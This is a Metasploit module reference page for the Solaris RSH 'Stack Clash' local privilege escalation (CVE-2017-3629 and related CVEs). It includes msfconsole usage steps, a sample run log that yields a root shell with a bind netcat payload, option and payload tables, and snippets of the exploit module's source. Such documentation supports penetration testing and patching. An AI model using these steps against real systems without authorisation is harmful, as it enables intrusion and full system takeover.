Solaris RSH Stack Clash Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/solaris/local/rsh_stack_clash_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Solaris RSH Stack Clash Privilege Escalation
Module: exploit/solaris/local/rsh_stack_clash_priv_esc
Source code: modules/exploits/solaris/local/rsh_stack_clash_priv_esc.rb
Disclosure date: 2017-06-19
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): x86, x64
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-3629, CVE-2017-3630, CVE-2017-3631, CVE-2017-1000364
This module is also known as Stack Clash or Solaris_rsh.c.
This module exploits a vulnerability in RSH on unpatched Solaris systems which allows users to gain root privileges. The stack guard page on unpatched Solaris systems is of insufficient size to prevent collisions between the stack and heap memory, aka Stack Clash. This module uploads and executes Qualys' Solaris_rsh.c exploit, which exploits a vulnerability in RSH to bypass the stack guard page to write to the stack and create a SUID root shell. This module has offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86). Exploitation will usually complete within a few minutes using the default number of worker threads (10). Occasionally, exploitation will fail. If the target system is vulnerable, usually re-running the exploit will be successful. This module has been tested successfully on Solaris 11.1 (x86) and Solaris 11.3 (x86).
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions command.
msf > use exploit/solaris/local/rsh_stack_clash_priv_esc
msf exploit(rsh_stack_clash_priv_esc) > show targets
... a list of targets ...
msf exploit(rsh_stack_clash_priv_esc) > set TARGET target-id
msf exploit(rsh_stack_clash_priv_esc) > show options
... show and set options ...
msf exploit(rsh_stack_clash_priv_esc) > set SESSION session-id
msf exploit(rsh_stack_clash_priv_esc) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Description
This module exploits a vulnerability in RSH on unpatched Solaris systems which allows users to gain root privileges.
The stack guard page on unpatched Solaris systems is of insufficient size to prevent collisions between the stack and heap memory, aka Stack Clash.
This module uploads and executes Qualys' Solaris_rsh.c exploit, which exploits a vulnerability in RSH to bypass the stack guard page to write to the stack and create a SUID root shell.
This module has offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86).
Exploitation will usually complete within a few minutes using the default number of worker threads (10). Occasionally, exploitation will fail. If the target system is vulnerable, usually re-running the exploit will be successful.
Vulnerable Application
This module has been tested successfully on:
- Solaris 11.1 (x86)
- Solaris 11.3 (x86)
Verification Steps
- Start
msfconsole - Get a session
- Do:
use exploit/solaris/local/rsh_stack_clash_priv_esc - Do:
set SESSION [SESSION] - Do:
run - You should get a new root session
Options
SESSION
Which session to use, which can be viewed with sessions.
RSH_PATH
Path to rsh executable. (default: /usr/bin/rsh)
WORKERS
Number of workers. (default: 10)
Scenarios
Solaris 11.3 (x86)
msf5 > use exploit/solaris/local/rsh_stack_clash_priv_esc
msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1
session => 1
msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221
rhost => 172.16.191.221
msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > run
[!] SESSION may not be compatible with this module.
[*] Using target: Solaris 11.3
[*] Writing '/tmp/.2yZgv2XkEj/.KJqSwhpguh.c' (10297 bytes) ...
[*] Symlinking /tmp/.2yZgv2XkEj/.KJqSwhpguh to /tmp/.2yZgv2XkEj/ROOT
[*] Creating suid root shell. This may take a while...
[*] Completed in 324.21s
[+] suid root shell created: /tmp/.2yZgv2XkEj/ROOT
[*] Writing '/tmp/.2yZgv2XkEj/.bWjzWVllCB' (109 bytes) ...
[*] Executing payload...
[*] Started bind TCP handler against 172.16.191.221:4444
[+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh.c
[+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh
[!] Tried to delete /tmp/.2yZgv2XkEj/ROOT, unknown result
[+] Deleted /tmp/.2yZgv2XkEj/.bWjzWVllCB
[+] Deleted /tmp/.2yZgv2XkEj
id
uid=0(root) gid=0(root) groups=10(staff)
uname -a
SunOS solaris 5.11 11.3 i86pc i386 i86pc
cat /etc/release
Oracle Solaris 11.3 X86
Copyright (c) 1983, 2015, Oracle and/or its affiliates. All rights reserved.
Assembled 06 October 2015
Go back to menu.
Msfconsole Usage
Here is how the solaris/local/rsh_stack_clash_priv_esc exploit module looks in the msfconsole:
msf6 > use exploit/solaris/local/rsh_stack_clash_priv_esc
[*] Using configured payload cmd/unix/bind_netcat
msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show info
Name: Solaris RSH Stack Clash Privilege Escalation
Module: exploit/solaris/local/rsh_stack_clash_priv_esc
Platform: Unix
Arch: x86, x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2017-06-19
Provided by:
Qualys Corporation
bcoles <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic
1 Solaris 11.1
2 Solaris 11.3
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RSH_PATH /usr/bin/rsh yes Path to rsh executable
SESSION yes The session to run this module on.
WORKERS 10 yes Number of workers
Payload information:
Description:
This module exploits a vulnerability in RSH on unpatched Solaris
systems which allows users to gain root privileges. The stack guard
page on unpatched Solaris systems is of insufficient size to prevent
collisions between the stack and heap memory, aka Stack Clash. This
module uploads and executes Qualys' Solaris_rsh.c exploit, which
exploits a vulnerability in RSH to bypass the stack guard page to
write to the stack and create a SUID root shell. This module has
offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86).
Exploitation will usually complete within a few minutes using the
default number of worker threads (10). Occasionally, exploitation
will fail. If the target system is vulnerable, usually re-running
the exploit will be successful. This module has been tested
successfully on Solaris 11.1 (x86) and Solaris 11.3 (x86).
References:
http://www.securityfocus.com/bid/99151
http://www.securityfocus.com/bid/99153
https://nvd.nist.gov/vuln/detail/CVE-2017-1000364
https://nvd.nist.gov/vuln/detail/CVE-2017-3629
https://nvd.nist.gov/vuln/detail/CVE-2017-3630
https://nvd.nist.gov/vuln/detail/CVE-2017-3631
https://www.exploit-db.com/exploits/42270
http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html
https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash
https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Also known as:
Stack Clash
Solaris_rsh.c
Module Options
This is a complete list of options available in the solaris/local/rsh_stack_clash_priv_esc exploit:
msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show options
Module options (exploit/solaris/local/rsh_stack_clash_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
RSH_PATH /usr/bin/rsh yes Path to rsh executable
SESSION yes The session to run this module on.
WORKERS 10 yes Number of workers
Payload options (cmd/unix/bind_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the solaris/local/rsh_stack_clash_priv_esc exploit:
msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show advanced
Module advanced options (exploit/solaris/local/rsh_stack_clash_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ForceExploit false no Override check result
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 10 no Additional delay in seconds to wait for a session
WritableDir /tmp yes A directory where we can write files
Payload advanced options (cmd/unix/bind_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the solaris/local/rsh_stack_clash_priv_esc module can exploit:
msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Solaris 11.1
2 Solaris 11.3
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the solaris/local/rsh_stack_clash_priv_esc exploit:
msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the solaris/local/rsh_stack_clash_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(solaris/local/rsh_stack_clash_priv_esc) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <PATH>.c failed to compile
- <RSH_PATH> is not setuid
- gcc is not installed
- Could not determine Solaris version
- Solaris version <VERSION> is not vulnerable
- Session already has root privileges
- <WRITABLEDIR> is not writable
- Unable to automatically select a target
- Failed to create suid root shell: <OUTPUT>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PATH>.c failed to compile
Here is a relevant code snippet related to the "<PATH>.c failed to compile" error message:
108: upload "#{path}.c", data
109:
110: output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -Wall -std=gnu99 -o #{path} #{path}.c"
111: unless output.blank?
112: print_error output
113: fail_with Failure::Unknown, "#{path}.c failed to compile"
114: end
115:
116: register_file_for_cleanup path
117: end
118:
<RSH_PATH> is not setuid
Here is a relevant code snippet related to the "<RSH_PATH> is not setuid" error message:
123: register_file_for_cleanup link_name
124: end
125:
126: def check
127: unless setuid? rsh_path
128: vprint_error "#{rsh_path} is not setuid"
129: return CheckCode::Safe
130: end
131: vprint_good "#{rsh_path} is setuid"
132:
133: unless has_gcc?
gcc is not installed
Here is a relevant code snippet related to the "gcc is not installed" error message:
129: return CheckCode::Safe
130: end
131: vprint_good "#{rsh_path} is setuid"
132:
133: unless has_gcc?
134: vprint_error 'gcc is not installed'
135: return CheckCode::Safe
136: end
137: vprint_good 'gcc is installed'
138:
139: version = kernel_version
Could not determine Solaris version
Here is a relevant code snippet related to the "Could not determine Solaris version" error message:
136: end
137: vprint_good 'gcc is installed'
138:
139: version = kernel_version
140: if version.to_s.eql? ''
141: vprint_error 'Could not determine Solaris version'
142: return CheckCode::Detected
143: end
144:
145: unless ['11.1', '11.3'].include? version
146: vprint_error "Solaris version #{version} is not vulnerable"
Solaris version <VERSION> is not vulnerable
Here is a relevant code snippet related to the "Solaris version <VERSION> is not vulnerable" error message:
141: vprint_error 'Could not determine Solaris version'
142: return CheckCode::Detected
143: end
144:
145: unless ['11.1', '11.3'].include? version
146: vprint_error "Solaris version #{version} is not vulnerable"
147: return CheckCode::Safe
148: end
149: vprint_good "Solaris version #{version} appears to be vulnerable"
150:
151: CheckCode::Detected
Session already has root privileges
Here is a relevant code snippet related to the "Session already has root privileges" error message:
151: CheckCode::Detected
152: end
153:
154: def exploit
155: if is_root?
156: fail_with Failure::BadConfig, 'Session already has root privileges'
157: end
158:
159: unless writable? datastore['WritableDir']
160: fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
161: end
<WRITABLEDIR> is not writable
Here is a relevant code snippet related to the "<WRITABLEDIR> is not writable" error message:
155: if is_root?
156: fail_with Failure::BadConfig, 'Session already has root privileges'
157: end
158:
159: unless writable? datastore['WritableDir']
160: fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
161: end
162:
163: if target.name.eql? 'Automatic'
164: case kernel_version
165: when '11.1'
Unable to automatically select a target
Here is a relevant code snippet related to the "Unable to automatically select a target" error message:
167: arg = 0
168: when '11.3'
169: my_target = targets[2]
170: arg = 1
171: else
172: fail_with Failure::NoTarget, 'Unable to automatically select a target'
173: end
174: else
175: my_target = target
176: end
177: print_status "Using target: #{my_target.name}"
Failed to create suid root shell: <OUTPUT>
Here is a relevant code snippet related to the "Failed to create suid root shell: <OUTPUT>" error message:
528: start = Time.now
529: output = cmd_exec "./#{exploit_name} #{arg}", nil, 1_800
530: stop = Time.now
531: print_status "Completed in #{(stop - start).round(2)}s"
532: unless output.include? 'root'
533: fail_with Failure::Unknown, "Failed to create suid root shell: #{output}"
534: end
535: print_good "suid root shell created: #{base_path}/#{root_shell}"
536:
537: payload_name = ".#{rand_text_alphanumeric 5..10}"
538: payload_path = "#{base_path}/#{payload_name}"
Go back to menu.
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_filemethod - #15540 Merged Pull Request: Add option for running
cmd_executein a subshell - #15303 Merged Pull Request: Fix
dirmethod for windows shell sessions - #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
- BID-99151
- BID-99153
- CVE-2017-1000364
- CVE-2017-3629
- CVE-2017-3630
- CVE-2017-3631
- EDB-42270
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html
- https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash
- https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
See Also
Check also the following modules related to this module:
- auxiliary/admin/sunrpc/solaris_kcms_readfile
- auxiliary/dos/solaris/lpd/cascade_delete
- exploit/solaris/dtspcd/heap_noir
- exploit/solaris/local/extremeparr_dtappgather_priv_esc
- exploit/solaris/local/libnspr_nspr_log_file_priv_esc
- exploit/solaris/local/xscreensaver_log_priv_esc
- exploit/solaris/lpd/sendmail_exec
- exploit/solaris/samba/lsa_transnames_heap
- exploit/solaris/samba/trans2open
- exploit/solaris/ssh/pam_username_bof
- exploit/solaris/sunrpc/sadmind_adm_build_path
- exploit/solaris/sunrpc/sadmind_exec
- exploit/solaris/sunrpc/ypupdated_exec
- exploit/solaris/telnet/fuser
- exploit/solaris/telnet/ttyprompt
- payload/solaris/sparc/shell_bind_tcp
- payload/solaris/sparc/shell_find_port
- payload/solaris/sparc/shell_reverse_tcp
- payload/solaris/x86/shell_bind_tcp
- payload/solaris/x86/shell_find_port
- payload/solaris/x86/shell_reverse_tcp
- post/solaris/escalate/pfexec
- post/solaris/escalate/srsexec_readline
- post/solaris/gather/checkvm
- post/solaris/gather/enum_packages
- post/solaris/gather/enum_services
- post/solaris/gather/hashdump
- auxiliary/scanner/rservices/rsh_login
- exploit/osx/local/rsh_libmalloc
- exploit/linux/local/cpi_runrshell_priv_esc
- exploit/multi/http/liferay_java_unmarshalling
- exploit/multi/misc/weblogic_deserialize_marshalledobject
- exploit/windows/browser/apple_quicktime_marshaled_punk
- exploit/windows/local/powershell_cmd_upgrade
- exploit/windows/local/powershell_remoting
- exploit/windows/misc/windows_rsh
- exploit/linux/http/foreman_openstack_satellite_code_exec
- exploit/linux/http/saltstack_salt_api_cmd_exec
- exploit/linux/http/saltstack_salt_wheel_async_rce
- exploit/linux/misc/saltstack_salt_unauth_rce
- exploit/windows/http/gitstack_rce
- auxiliary/admin/http/foreman_openstack_satellite_priv_esc
- auxiliary/admin/http/gitstack_rest
- auxiliary/dos/http/3com_superstack_switch
- auxiliary/gather/saltstack_salt_root_key
- post/multi/gather/saltstack_salt
Related Nessus plugins:
- Amazon Linux AMI : kernel (ALAS-2017-845) (Stack Clash)
- Debian DLA-993-2 : linux regression update (Stack Clash)
- Debian DSA-3886-1 : linux - security update (Stack Clash)
- Oracle Linux 7 : kernel (ELSA-2017-1484)
- Oracle Linux 6 : kernel (ELSA-2017-1486)
- RHEL 5 : kernel (RHSA-2017:1483) (Stack Clash)
- RHEL 7 : kernel (RHSA-2017:1484) (Stack Clash)
- RHEL 7 : kernel (RHSA-2017:1485) (Stack Clash)
- RHEL 6 : kernel (RHSA-2017:1486) (Stack Clash)
- RHEL 6 : kernel (RHSA-2017:1487) (Stack Clash)
Authors
- Qualys Corporation
- bcoles
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
